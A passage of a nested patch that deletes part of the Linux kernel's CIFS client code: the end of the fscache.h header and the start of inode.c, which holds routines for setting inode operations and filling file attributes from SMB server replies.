+-
+-extern int __cifs_readpage_from_fscache(struct inode *pinode, struct page *ppage);
+-extern void __cifs_readpage_to_fscache(struct inode *pinode, struct page *ppage);
+-
+-
+-static inline int cifs_readpage_from_fscache(struct inode *inode,
+-					     struct page *page)
+-{
+-	if (cifs_inode_cookie(inode))
+-		return __cifs_readpage_from_fscache(inode, page);
+-	return -ENOBUFS;
+-}
+-
+-static inline void cifs_readpage_to_fscache(struct inode *inode,
+-					    struct page *page)
+-{
+-	if (cifs_inode_cookie(inode))
+-		__cifs_readpage_to_fscache(inode, page);
+-}
+-
+-#else /* CONFIG_CIFS_FSCACHE */
+-static inline
+-void cifs_fscache_fill_coherency(struct inode *inode,
+-				 struct cifs_fscache_inode_coherency_data *cd)
+-{
+-}
+-
+-static inline int cifs_fscache_get_super_cookie(struct cifs_tcon *tcon) { return 0; }
+-static inline void cifs_fscache_release_super_cookie(struct cifs_tcon *tcon) {}
+-
+-static inline void cifs_fscache_get_inode_cookie(struct inode *inode) {}
+-static inline void cifs_fscache_release_inode_cookie(struct inode *inode) {}
+-static inline void cifs_fscache_unuse_inode_cookie(struct inode *inode, bool update) {}
+-static inline struct fscache_cookie *cifs_inode_cookie(struct inode *inode) { return NULL; }
+-static inline void cifs_invalidate_cache(struct inode *inode, unsigned int flags) {}
+-
+-static inline int cifs_fscache_query_occupancy(struct inode *inode,
+-					       pgoff_t first, unsigned int nr_pages,
+-					       pgoff_t *_data_first,
+-					       unsigned int *_data_nr_pages)
+-{
+-	*_data_first = ULONG_MAX;
+-	*_data_nr_pages = 0;
+-	return -ENOBUFS;
+-}
+-
+-static inline int
+-cifs_readpage_from_fscache(struct inode *inode, struct page *page)
+-{
+-	return -ENOBUFS;
+-}
+-
+-static inline
+-void cifs_readpage_to_fscache(struct inode *inode, struct page *page) {}
+-
+-#endif /* CONFIG_CIFS_FSCACHE */
+-
+-#endif /* _CIFS_FSCACHE_H */
+diff --git a/fs/cifs/inode.c b/fs/cifs/inode.c
+deleted file mode 100644
+index 8901d884f5b98..0000000000000
+--- a/fs/cifs/inode.c
++++ /dev/null
+@@ -1,3093 +0,0 @@
+-// SPDX-License-Identifier: LGPL-2.1
+-/*
+- *
+- *   Copyright (C) International Business Machines  Corp., 2002,2010
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- *
+- */
+-#include <linux/fs.h>
+-#include <linux/stat.h>
+-#include <linux/slab.h>
+-#include <linux/pagemap.h>
+-#include <linux/freezer.h>
+-#include <linux/sched/signal.h>
+-#include <linux/wait_bit.h>
+-#include <linux/fiemap.h>
+-#include <asm/div64.h>
+-#include "cifsfs.h"
+-#include "cifspdu.h"
+-#include "cifsglob.h"
+-#include "cifsproto.h"
+-#include "smb2proto.h"
+-#include "cifs_debug.h"
+-#include "cifs_fs_sb.h"
+-#include "cifs_unicode.h"
+-#include "fscache.h"
+-#include "fs_context.h"
+-#include "cifs_ioctl.h"
+-#include "cached_dir.h"
+-
+-static void cifs_set_ops(struct inode *inode)
+-{
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
+-
+-	switch (inode->i_mode & S_IFMT) {
+-	case S_IFREG:
+-		inode->i_op = &cifs_file_inode_ops;
+-		if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_DIRECT_IO) {
+-			if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_BRL)
+-				inode->i_fop = &cifs_file_direct_nobrl_ops;
+-			else
+-				inode->i_fop = &cifs_file_direct_ops;
+-		} else if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_STRICT_IO) {
+-			if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_BRL)
+-				inode->i_fop = &cifs_file_strict_nobrl_ops;
+-			else
+-				inode->i_fop = &cifs_file_strict_ops;
+-		} else if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_BRL)
+-			inode->i_fop = &cifs_file_nobrl_ops;
+-		else { /* not direct, send byte range locks */
+-			inode->i_fop = &cifs_file_ops;
+-		}
+-
+-		/* check if server can support readahead */
+-		if (cifs_sb_master_tcon(cifs_sb)->ses->server->max_read <
+-				PAGE_SIZE + MAX_CIFS_HDR_SIZE)
+-			inode->i_data.a_ops = &cifs_addr_ops_smallbuf;
+-		else
+-			inode->i_data.a_ops = &cifs_addr_ops;
+-		break;
+-	case S_IFDIR:
+-#ifdef CONFIG_CIFS_DFS_UPCALL
+-		if (IS_AUTOMOUNT(inode)) {
+-			inode->i_op = &cifs_dfs_referral_inode_operations;
+-		} else {
+-#else /* NO DFS support, treat as a directory */
+-		{
+-#endif
+-			inode->i_op = &cifs_dir_inode_ops;
+-			inode->i_fop = &cifs_dir_ops;
+-		}
+-		break;
+-	case S_IFLNK:
+-		inode->i_op = &cifs_symlink_inode_ops;
+-		break;
+-	default:
+-		init_special_inode(inode, inode->i_mode, inode->i_rdev);
+-		break;
+-	}
+-}
+-
+-/* check inode attributes against fattr. If they don't match, tag the
+- * inode for cache invalidation
+- */
+-static void
+-cifs_revalidate_cache(struct inode *inode, struct cifs_fattr *fattr)
+-{
+-	struct cifs_fscache_inode_coherency_data cd;
+-	struct cifsInodeInfo *cifs_i = CIFS_I(inode);
+-
+-	cifs_dbg(FYI, "%s: revalidating inode %llu\n",
+-		 __func__, cifs_i->uniqueid);
+-
+-	if (inode->i_state & I_NEW) {
+-		cifs_dbg(FYI, "%s: inode %llu is new\n",
+-			 __func__, cifs_i->uniqueid);
+-		return;
+-	}
+-
+-	/* don't bother with revalidation if we have an oplock */
+-	if (CIFS_CACHE_READ(cifs_i)) {
+-		cifs_dbg(FYI, "%s: inode %llu is oplocked\n",
+-			 __func__, cifs_i->uniqueid);
+-		return;
+-	}
+-
+-	 /* revalidate if mtime or size have changed */
+-	fattr->cf_mtime = timestamp_truncate(fattr->cf_mtime, inode);
+-	if (timespec64_equal(&inode->i_mtime, &fattr->cf_mtime) &&
+-	    cifs_i->server_eof == fattr->cf_eof) {
+-		cifs_dbg(FYI, "%s: inode %llu is unchanged\n",
+-			 __func__, cifs_i->uniqueid);
+-		return;
+-	}
+-
+-	cifs_dbg(FYI, "%s: invalidating inode %llu mapping\n",
+-		 __func__, cifs_i->uniqueid);
+-	set_bit(CIFS_INO_INVALID_MAPPING, &cifs_i->flags);
+-	/* Invalidate fscache cookie */
+-	cifs_fscache_fill_coherency(&cifs_i->netfs.inode, &cd);
+-	fscache_invalidate(cifs_inode_cookie(inode), &cd, i_size_read(inode), 0);
+-}
+-
+-/*
+- * copy nlink to the inode, unless it wasn't provided.  Provide
+- * sane values if we don't have an existing one and none was provided
+- */
+-static void
+-cifs_nlink_fattr_to_inode(struct inode *inode, struct cifs_fattr *fattr)
+-{
+-	/*
+-	 * if we're in a situation where we can't trust what we
+-	 * got from the server (readdir, some non-unix cases)
+-	 * fake reasonable values
+-	 */
+-	if (fattr->cf_flags & CIFS_FATTR_UNKNOWN_NLINK) {
+-		/* only provide fake values on a new inode */
+-		if (inode->i_state & I_NEW) {
+-			if (fattr->cf_cifsattrs & ATTR_DIRECTORY)
+-				set_nlink(inode, 2);
+-			else
+-				set_nlink(inode, 1);
+-		}
+-		return;
+-	}
+-
+-	/* we trust the server, so update it */
+-	set_nlink(inode, fattr->cf_nlink);
+-}
+-
+-/* populate an inode with info from a cifs_fattr struct */
+-int
+-cifs_fattr_to_inode(struct inode *inode, struct cifs_fattr *fattr)
+-{
+-	struct cifsInodeInfo *cifs_i = CIFS_I(inode);
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
+-
+-	if (!(inode->i_state & I_NEW) &&
+-	    unlikely(inode_wrong_type(inode, fattr->cf_mode))) {
+-		CIFS_I(inode)->time = 0; /* force reval */
+-		return -ESTALE;
+-	}
+-
+-	cifs_revalidate_cache(inode, fattr);
+-
+-	spin_lock(&inode->i_lock);
+-	fattr->cf_mtime = timestamp_truncate(fattr->cf_mtime, inode);
+-	fattr->cf_atime = timestamp_truncate(fattr->cf_atime, inode);
+-	fattr->cf_ctime = timestamp_truncate(fattr->cf_ctime, inode);
+-	/* we do not want atime to be less than mtime, it broke some apps */
+-	if (timespec64_compare(&fattr->cf_atime, &fattr->cf_mtime) < 0)
+-		inode->i_atime = fattr->cf_mtime;
+-	else
+-		inode->i_atime = fattr->cf_atime;
+-	inode->i_mtime = fattr->cf_mtime;
+-	inode->i_ctime = fattr->cf_ctime;
+-	inode->i_rdev = fattr->cf_rdev;
+-	cifs_nlink_fattr_to_inode(inode, fattr);
+-	inode->i_uid = fattr->cf_uid;
+-	inode->i_gid = fattr->cf_gid;
+-
+-	/* if dynperm is set, don't clobber existing mode */
+-	if (inode->i_state & I_NEW ||
+-	    !(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_DYNPERM))
+-		inode->i_mode = fattr->cf_mode;
+-
+-	cifs_i->cifsAttrs = fattr->cf_cifsattrs;
+-
+-	if (fattr->cf_flags & CIFS_FATTR_NEED_REVAL)
+-		cifs_i->time = 0;
+-	else
+-		cifs_i->time = jiffies;
+-
+-	if (fattr->cf_flags & CIFS_FATTR_DELETE_PENDING)
+-		set_bit(CIFS_INO_DELETE_PENDING, &cifs_i->flags);
+-	else
+-		clear_bit(CIFS_INO_DELETE_PENDING, &cifs_i->flags);
+-
+-	cifs_i->server_eof = fattr->cf_eof;
+-	/*
+-	 * Can't safely change the file size here if the client is writing to
+-	 * it due to potential races.
+-	 */
+-	if (is_size_safe_to_change(cifs_i, fattr->cf_eof)) {
+-		i_size_write(inode, fattr->cf_eof);
+-
+-		/*
+-		 * i_blocks is not related to (i_size / i_blksize),
+-		 * but instead 512 byte (2**9) size is required for
+-		 * calculating num blocks.
+-		 */
+-		inode->i_blocks = (512 - 1 + fattr->cf_bytes) >> 9;
+-	}
+-
+-	if (S_ISLNK(fattr->cf_mode)) {
+-		kfree(cifs_i->symlink_target);
+-		cifs_i->symlink_target = fattr->cf_symlink_target;
+-		fattr->cf_symlink_target = NULL;
+-	}
+-	spin_unlock(&inode->i_lock);
+-
+-	if (fattr->cf_flags & CIFS_FATTR_DFS_REFERRAL)
+-		inode->i_flags |= S_AUTOMOUNT;
+-	if (inode->i_state & I_NEW)
+-		cifs_set_ops(inode);
+-	return 0;
+-}
+-
+-void
+-cifs_fill_uniqueid(struct super_block *sb, struct cifs_fattr *fattr)
+-{
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
+-
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SERVER_INUM)
+-		return;
+-
+-	fattr->cf_uniqueid = iunique(sb, ROOT_I);
+-}
+-
+-/* Fill a cifs_fattr struct with info from FILE_UNIX_BASIC_INFO. */
+-void
+-cifs_unix_basic_to_fattr(struct cifs_fattr *fattr, FILE_UNIX_BASIC_INFO *info,
+-			 struct cifs_sb_info *cifs_sb)
+-{
+-	memset(fattr, 0, sizeof(*fattr));
+-	fattr->cf_uniqueid = le64_to_cpu(info->UniqueId);
+-	fattr->cf_bytes = le64_to_cpu(info->NumOfBytes);
+-	fattr->cf_eof = le64_to_cpu(info->EndOfFile);
+-
+-	fattr->cf_atime = cifs_NTtimeToUnix(info->LastAccessTime);
+-	fattr->cf_mtime = cifs_NTtimeToUnix(info->LastModificationTime);
+-	fattr->cf_ctime = cifs_NTtimeToUnix(info->LastStatusChange);
+-	/* old POSIX extensions don't get create time */
+-
+-	fattr->cf_mode = le64_to_cpu(info->Permissions);
+-
+-	/*
+-	 * Since we set the inode type below we need to mask off
+-	 * to avoid strange results if bits set above.
+-	 */
+-	fattr->cf_mode &= ~S_IFMT;
+-	switch (le32_to_cpu(info->Type)) {
+-	case UNIX_FILE:
+-		fattr->cf_mode |= S_IFREG;
+-		fattr->cf_dtype = DT_REG;
+-		break;
+-	case UNIX_SYMLINK:
+-		fattr->cf_mode |= S_IFLNK;
+-		fattr->cf_dtype = DT_LNK;
+-		break;
+-	case UNIX_DIR:
+-		fattr->cf_mode |= S_IFDIR;
+-		fattr->cf_dtype = DT_DIR;
+-		break;
+-	case UNIX_CHARDEV:
+-		fattr->cf_mode |= S_IFCHR;
+-		fattr->cf_dtype = DT_CHR;
+-		fattr->cf_rdev = MKDEV(le64_to_cpu(info->DevMajor),
+-				       le64_to_cpu(info->DevMinor) & MINORMASK);
+-		break;
+-	case UNIX_BLOCKDEV:
+-		fattr->cf_mode |= S_IFBLK;
+-		fattr->cf_dtype = DT_BLK;
+-		fattr->cf_rdev = MKDEV(le64_to_cpu(info->DevMajor),
+-				       le64_to_cpu(info->DevMinor) & MINORMASK);
+-		break;
+-	case UNIX_FIFO:
+-		fattr->cf_mode |= S_IFIFO;
+-		fattr->cf_dtype = DT_FIFO;
+-		break;
+-	case UNIX_SOCKET:
+-		fattr->cf_mode |= S_IFSOCK;
+-		fattr->cf_dtype = DT_SOCK;
+-		break;
+-	default:
+-		/* safest to call it a file if we do not know */
+-		fattr->cf_mode |= S_IFREG;
+-		fattr->cf_dtype = DT_REG;
+-		cifs_dbg(FYI, "unknown type %d\n", le32_to_cpu(info->Type));
+-		break;
+-	}
+-
+-	fattr->cf_uid = cifs_sb->ctx->linux_uid;
+-	if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_OVERR_UID)) {
+-		u64 id = le64_to_cpu(info->Uid);
+-		if (id < ((uid_t)-1)) {
+-			kuid_t uid = make_kuid(&init_user_ns, id);
+-			if (uid_valid(uid))
+-				fattr->cf_uid = uid;
+-		}
+-	}
+-	
+-	fattr->cf_gid = cifs_sb->ctx->linux_gid;
+-	if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_OVERR_GID)) {
+-		u64 id = le64_to_cpu(info->Gid);
+-		if (id < ((gid_t)-1)) {
+-			kgid_t gid = make_kgid(&init_user_ns, id);
+-			if (gid_valid(gid))
+-				fattr->cf_gid = gid;
+-		}
+-	}
+-
+-	fattr->cf_nlink = le64_to_cpu(info->Nlinks);
+-}
+-
+-/*
+- * Fill a cifs_fattr struct with fake inode info.
+- *
+- * Needed to setup cifs_fattr data for the directory which is the
+- * junction to the new submount (ie to setup the fake directory
+- * which represents a DFS referral).
+- */
+-static void
+-cifs_create_dfs_fattr(struct cifs_fattr *fattr, struct super_block *sb)
+-{
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
+-
+-	cifs_dbg(FYI, "creating fake fattr for DFS referral\n");
+-
+-	memset(fattr, 0, sizeof(*fattr));
+-	fattr->cf_mode = S_IFDIR | S_IXUGO | S_IRWXU;
+-	fattr->cf_uid = cifs_sb->ctx->linux_uid;
+-	fattr->cf_gid = cifs_sb->ctx->linux_gid;
+-	ktime_get_coarse_real_ts64(&fattr->cf_mtime);
+-	fattr->cf_atime = fattr->cf_ctime = fattr->cf_mtime;
+-	fattr->cf_nlink = 2;
+-	fattr->cf_flags = CIFS_FATTR_DFS_REFERRAL;
+-}
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-static int
+-cifs_get_file_info_unix(struct file *filp)
+-{
+-	int rc;
+-	unsigned int xid;
+-	FILE_UNIX_BASIC_INFO find_data;
+-	struct cifs_fattr fattr = {};
+-	struct inode *inode = file_inode(filp);
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
+-	struct cifsFileInfo *cfile = filp->private_data;
+-	struct cifs_tcon *tcon = tlink_tcon(cfile->tlink);
+-
+-	xid = get_xid();
+-
+-	if (cfile->symlink_target) {
+-		fattr.cf_symlink_target = kstrdup(cfile->symlink_target, GFP_KERNEL);
+-		if (!fattr.cf_symlink_target) {
+-			rc = -ENOMEM;
+-			goto cifs_gfiunix_out;
+-		}
+-	}
+-
+-	rc = CIFSSMBUnixQFileInfo(xid, tcon, cfile->fid.netfid, &find_data);
+-	if (!rc) {
+-		cifs_unix_basic_to_fattr(&fattr, &find_data, cifs_sb);
+-	} else if (rc == -EREMOTE) {
+-		cifs_create_dfs_fattr(&fattr, inode->i_sb);
+-		rc = 0;
+-	} else
+-		goto cifs_gfiunix_out;
+-
+-	rc = cifs_fattr_to_inode(inode, &fattr);
+-
+-cifs_gfiunix_out:
+-	free_xid(xid);
+-	return rc;
+-}
+-
+-int cifs_get_inode_info_unix(struct inode **pinode,
+-			     const unsigned char *full_path,
+-			     struct super_block *sb, unsigned int xid)
+-{
+-	int rc;
+-	FILE_UNIX_BASIC_INFO find_data;
+-	struct cifs_fattr fattr;
+-	struct cifs_tcon *tcon;
+-	struct TCP_Server_Info *server;
+-	struct tcon_link *tlink;
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
+-
+-	cifs_dbg(FYI, "Getting info on %s\n", full_path);
+-
+-	tlink = cifs_sb_tlink(cifs_sb);
+-	if (IS_ERR(tlink))
+-		return PTR_ERR(tlink);
+-	tcon = tlink_tcon(tlink);
+-	server = tcon->ses->server;
+-
+-	/* could have done a find first instead but this returns more info */
+-	rc = CIFSSMBUnixQPathInfo(xid, tcon, full_path, &find_data,
+-				  cifs_sb->local_nls, cifs_remap(cifs_sb));
+-	cifs_dbg(FYI, "%s: query path info: rc = %d\n", __func__, rc);
+-	cifs_put_tlink(tlink);
+-
+-	if (!rc) {
+-		cifs_unix_basic_to_fattr(&fattr, &find_data, cifs_sb);
+-	} else if (rc == -EREMOTE) {
+-		cifs_create_dfs_fattr(&fattr, sb);
+-		rc = 0;
+-	} else {
+-		return rc;
+-	}
+-
+-	/* check for Minshall+French symlinks */
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MF_SYMLINKS) {
+-		int tmprc = check_mf_symlink(xid, tcon, cifs_sb, &fattr,
+-					     full_path);
+-		if (tmprc)
+-			cifs_dbg(FYI, "check_mf_symlink: %d\n", tmprc);
+-	}
+-
+-	if (S_ISLNK(fattr.cf_mode) && !fattr.cf_symlink_target) {
+-		if (!server->ops->query_symlink)
+-			return -EOPNOTSUPP;
+-		rc = server->ops->query_symlink(xid, tcon, cifs_sb, full_path,
+-						&fattr.cf_symlink_target, false);
+-		if (rc) {
+-			cifs_dbg(FYI, "%s: query_symlink: %d\n", __func__, rc);
+-			goto cgiiu_exit;
+-		}
+-	}
+-
+-	if (*pinode == NULL) {
+-		/* get new inode */
+-		cifs_fill_uniqueid(sb, &fattr);
+-		*pinode = cifs_iget(sb, &fattr);
+-		if (!*pinode)
+-			rc = -ENOMEM;
+-	} else {
+-		/* we already have inode, update it */
+-
+-		/* if uniqueid is different, return error */
+-		if (unlikely(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SERVER_INUM &&
+-		    CIFS_I(*pinode)->uniqueid != fattr.cf_uniqueid)) {
+-			CIFS_I(*pinode)->time = 0; /* force reval */
+-			rc = -ESTALE;
+-			goto cgiiu_exit;
+-		}
+-
+-		/* if filetype is different, return error */
+-		rc = cifs_fattr_to_inode(*pinode, &fattr);
+-	}
+-
+-cgiiu_exit:
+-	kfree(fattr.cf_symlink_target);
+-	return rc;
+-}
+-#else
+-int cifs_get_inode_info_unix(struct inode **pinode,
+-			     const unsigned char *full_path,
+-			     struct super_block *sb, unsigned int xid)
+-{
+-	return -EOPNOTSUPP;
+-}
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-
+-static int
+-cifs_sfu_type(struct cifs_fattr *fattr, const char *path,
+-	      struct cifs_sb_info *cifs_sb, unsigned int xid)
+-{
+-	int rc;
+-	__u32 oplock;
+-	struct tcon_link *tlink;
+-	struct cifs_tcon *tcon;
+-	struct cifs_fid fid;
+-	struct cifs_open_parms oparms;
+-	struct cifs_io_parms io_parms = {0};
+-	char buf[24];
+-	unsigned int bytes_read;
+-	char *pbuf;
+-	int buf_type = CIFS_NO_BUFFER;
+-
+-	pbuf = buf;
+-
+-	fattr->cf_mode &= ~S_IFMT;
+-
+-	if (fattr->cf_eof == 0) {
+-		fattr->cf_mode |= S_IFIFO;
+-		fattr->cf_dtype = DT_FIFO;
+-		return 0;
+-	} else if (fattr->cf_eof < 8) {
+-		fattr->cf_mode |= S_IFREG;
+-		fattr->cf_dtype = DT_REG;
+-		return -EINVAL;	 /* EOPNOTSUPP? */
+-	}
+-
+-	tlink = cifs_sb_tlink(cifs_sb);
+-	if (IS_ERR(tlink))
+-		return PTR_ERR(tlink);
+-	tcon = tlink_tcon(tlink);
+-
+-	oparms = (struct cifs_open_parms) {
+-		.tcon = tcon,
+-		.cifs_sb = cifs_sb,
+-		.desired_access = GENERIC_READ,
+-		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR),
+-		.disposition = FILE_OPEN,
+-		.path = path,
+-		.fid = &fid,
+-	};
+-
+-	if (tcon->ses->server->oplocks)
+-		oplock = REQ_OPLOCK;
+-	else
+-		oplock = 0;
+-	rc = tcon->ses->server->ops->open(xid, &oparms, &oplock, NULL);
+-	if (rc) {
+-		cifs_dbg(FYI, "check sfu type of %s, open rc = %d\n", path, rc);
+-		cifs_put_tlink(tlink);
+-		return rc;
+-	}
+-
+-	/* Read header */
+-	io_parms.netfid = fid.netfid;
+-	io_parms.pid = current->tgid;
+-	io_parms.tcon = tcon;
+-	io_parms.offset = 0;
+-	io_parms.length = 24;
+-
+-	rc = tcon->ses->server->ops->sync_read(xid, &fid, &io_parms,
+-					&bytes_read, &pbuf, &buf_type);
+-	if ((rc == 0) && (bytes_read >= 8)) {
+-		if (memcmp("IntxBLK", pbuf, 8) == 0) {
+-			cifs_dbg(FYI, "Block device\n");
+-			fattr->cf_mode |= S_IFBLK;
+-			fattr->cf_dtype = DT_BLK;
+-			if (bytes_read == 24) {
+-				/* we have enough to decode dev num */
+-				__u64 mjr; /* major */
+-				__u64 mnr; /* minor */
+-				mjr = le64_to_cpu(*(__le64 *)(pbuf+8));
+-				mnr = le64_to_cpu(*(__le64 *)(pbuf+16));
+-				fattr->cf_rdev = MKDEV(mjr, mnr);
+-			}
+-		} else if (memcmp("IntxCHR", pbuf, 8) == 0) {
+-			cifs_dbg(FYI, "Char device\n");
+-			fattr->cf_mode |= S_IFCHR;
+-			fattr->cf_dtype = DT_CHR;
+-			if (bytes_read == 24) {
+-				/* we have enough to decode dev num */
+-				__u64 mjr; /* major */
+-				__u64 mnr; /* minor */
+-				mjr = le64_to_cpu(*(__le64 *)(pbuf+8));
+-				mnr = le64_to_cpu(*(__le64 *)(pbuf+16));
+-				fattr->cf_rdev = MKDEV(mjr, mnr);
+-			}
+-		} else if (memcmp("IntxLNK", pbuf, 7) == 0) {
+-			cifs_dbg(FYI, "Symlink\n");
+-			fattr->cf_mode |= S_IFLNK;
+-			fattr->cf_dtype = DT_LNK;
+-		} else {
+-			fattr->cf_mode |= S_IFREG; /* file? */
+-			fattr->cf_dtype = DT_REG;
+-			rc = -EOPNOTSUPP;
+-		}
+-	} else {
+-		fattr->cf_mode |= S_IFREG; /* then it is a file */
+-		fattr->cf_dtype = DT_REG;
+-		rc = -EOPNOTSUPP; /* or some unknown SFU type */
+-	}
+-
+-	tcon->ses->server->ops->close(xid, tcon, &fid);
+-	cifs_put_tlink(tlink);
+-	return rc;
+-}
+-
+-#define SFBITS_MASK (S_ISVTX | S_ISGID | S_ISUID)  /* SETFILEBITS valid bits */
+-
+-/*
+- * Fetch mode bits as provided by SFU.
+- *
+- * FIXME: Doesn't this clobber the type bit we got from cifs_sfu_type ?
+- */
+-static int cifs_sfu_mode(struct cifs_fattr *fattr, const unsigned char *path,
+-			 struct cifs_sb_info *cifs_sb, unsigned int xid)
+-{
+-#ifdef CONFIG_CIFS_XATTR
+-	ssize_t rc;
+-	char ea_value[4];
+-	__u32 mode;
+-	struct tcon_link *tlink;
+-	struct cifs_tcon *tcon;
+-
+-	tlink = cifs_sb_tlink(cifs_sb);
+-	if (IS_ERR(tlink))
+-		return PTR_ERR(tlink);
+-	tcon = tlink_tcon(tlink);
+-
+-	if (tcon->ses->server->ops->query_all_EAs == NULL) {
+-		cifs_put_tlink(tlink);
+-		return -EOPNOTSUPP;
+-	}
+-
+-	rc = tcon->ses->server->ops->query_all_EAs(xid, tcon, path,
+-			"SETFILEBITS", ea_value, 4 /* size of buf */,
+-			cifs_sb);
+-	cifs_put_tlink(tlink);
+-	if (rc < 0)
+-		return (int)rc;
+-	else if (rc > 3) {
+-		mode = le32_to_cpu(*((__le32 *)ea_value));
+-		fattr->cf_mode &= ~SFBITS_MASK;
+-		cifs_dbg(FYI, "special bits 0%o org mode 0%o\n",
+-			 mode, fattr->cf_mode);
+-		fattr->cf_mode = (mode & SFBITS_MASK) | fattr->cf_mode;
+-		cifs_dbg(FYI, "special mode bits 0%o\n", mode);
+-	}
+-
+-	return 0;
+-#else
+-	return -EOPNOTSUPP;
+-#endif
+-}
+-
+-/* Fill a cifs_fattr struct with info from POSIX info struct */
+-static void smb311_posix_info_to_fattr(struct cifs_fattr *fattr, struct cifs_open_info_data *data,
+-				       struct super_block *sb, bool adjust_tz, bool symlink)
+-{
+-	struct smb311_posix_qinfo *info = &data->posix_fi;
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
+-	struct cifs_tcon *tcon = cifs_sb_master_tcon(cifs_sb);
+-
+-	memset(fattr, 0, sizeof(*fattr));
+-
+-	/* no fattr->flags to set */
+-	fattr->cf_cifsattrs = le32_to_cpu(info->DosAttributes);
+-	fattr->cf_uniqueid = le64_to_cpu(info->Inode);
+-
+-	if (info->LastAccessTime)
+-		fattr->cf_atime = cifs_NTtimeToUnix(info->LastAccessTime);
+-	else
+-		ktime_get_coarse_real_ts64(&fattr->cf_atime);
+-
+-	fattr->cf_ctime = cifs_NTtimeToUnix(info->ChangeTime);
+-	fattr->cf_mtime = cifs_NTtimeToUnix(info->LastWriteTime);
+-
+-	if (adjust_tz) {
+-		fattr->cf_ctime.tv_sec += tcon->ses->server->timeAdj;
+-		fattr->cf_mtime.tv_sec += tcon->ses->server->timeAdj;
+-	}
+-
+-	fattr->cf_eof = le64_to_cpu(info->EndOfFile);
+-	fattr->cf_bytes = le64_to_cpu(info->AllocationSize);
+-	fattr->cf_createtime = le64_to_cpu(info->CreationTime);
+-
+-	fattr->cf_nlink = le32_to_cpu(info->HardLinks);
+-	fattr->cf_mode = (umode_t) le32_to_cpu(info->Mode);
+-	/* The srv fs device id is overridden on network mount so setting rdev isn't needed here */
+-	/* fattr->cf_rdev = le32_to_cpu(info->DeviceId); */
+-
+-	if (symlink) {
+-		fattr->cf_mode |= S_IFLNK;
+-		fattr->cf_dtype = DT_LNK;
+-		fattr->cf_symlink_target = data->symlink_target;
+-		data->symlink_target = NULL;
+-	} else if (fattr->cf_cifsattrs & ATTR_DIRECTORY) {
+-		fattr->cf_mode |= S_IFDIR;
+-		fattr->cf_dtype = DT_DIR;
+-	} else { /* file */
+-		fattr->cf_mode |= S_IFREG;
+-		fattr->cf_dtype = DT_REG;
+-	}
+-	/* else if reparse point ... TODO: add support for FIFO and blk dev; special file types */
+-
+-	fattr->cf_uid = cifs_sb->ctx->linux_uid; /* TODO: map uid and gid from SID */
+-	fattr->cf_gid = cifs_sb->ctx->linux_gid;
+-
+-	cifs_dbg(FYI, "POSIX query info: mode 0x%x uniqueid 0x%llx nlink %d\n",
+-		fattr->cf_mode, fattr->cf_uniqueid, fattr->cf_nlink);
+-}
+-
+-static void cifs_open_info_to_fattr(struct cifs_fattr *fattr, struct cifs_open_info_data *data,
+-				    struct super_block *sb, bool adjust_tz, bool symlink,
+-				    u32 reparse_tag)
+-{
+-	struct smb2_file_all_info *info = &data->fi;
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
+-	struct cifs_tcon *tcon = cifs_sb_master_tcon(cifs_sb);
+-
+-	memset(fattr, 0, sizeof(*fattr));
+-	fattr->cf_cifsattrs = le32_to_cpu(info->Attributes);
+-	if (info->DeletePending)
+-		fattr->cf_flags |= CIFS_FATTR_DELETE_PENDING;
+-
+-	if (info->LastAccessTime)
+-		fattr->cf_atime = cifs_NTtimeToUnix(info->LastAccessTime);
+-	else
+-		ktime_get_coarse_real_ts64(&fattr->cf_atime);
+-
+-	fattr->cf_ctime = cifs_NTtimeToUnix(info->ChangeTime);
+-	fattr->cf_mtime = cifs_NTtimeToUnix(info->LastWriteTime);
+-
+-	if (adjust_tz) {
+-		fattr->cf_ctime.tv_sec += tcon->ses->server->timeAdj;
+-		fattr->cf_mtime.tv_sec += tcon->ses->server->timeAdj;
+-	}
+-
+-	fattr->cf_eof = le64_to_cpu(info->EndOfFile);
+-	fattr->cf_bytes = le64_to_cpu(info->AllocationSize);
+-	fattr->cf_createtime = le64_to_cpu(info->CreationTime);
+-
+-	fattr->cf_nlink = le32_to_cpu(info->NumberOfLinks);
+-	if (reparse_tag == IO_REPARSE_TAG_LX_SYMLINK) {
+-		fattr->cf_mode |= S_IFLNK | cifs_sb->ctx->file_mode;
+-		fattr->cf_dtype = DT_LNK;
+-	} else if (reparse_tag == IO_REPARSE_TAG_LX_FIFO) {
+-		fattr->cf_mode |= S_IFIFO | cifs_sb->ctx->file_mode;
+-		fattr->cf_dtype = DT_FIFO;
+-	} else if (reparse_tag == IO_REPARSE_TAG_AF_UNIX) {
+-		fattr->cf_mode |= S_IFSOCK | cifs_sb->ctx->file_mode;
+-		fattr->cf_dtype = DT_SOCK;
+-	} else if (reparse_tag == IO_REPARSE_TAG_LX_CHR) {
+-		fattr->cf_mode |= S_IFCHR | cifs_sb->ctx->file_mode;
+-		fattr->cf_dtype = DT_CHR;
+-	} else if (reparse_tag == IO_REPARSE_TAG_LX_BLK) {
+-		fattr->cf_mode |= S_IFBLK | cifs_sb->ctx->file_mode;
+-		fattr->cf_dtype = DT_BLK;
+-	} else if (symlink || reparse_tag == IO_REPARSE_TAG_SYMLINK ||
+-		   reparse_tag == IO_REPARSE_TAG_NFS) {
+-		fattr->cf_mode = S_IFLNK;
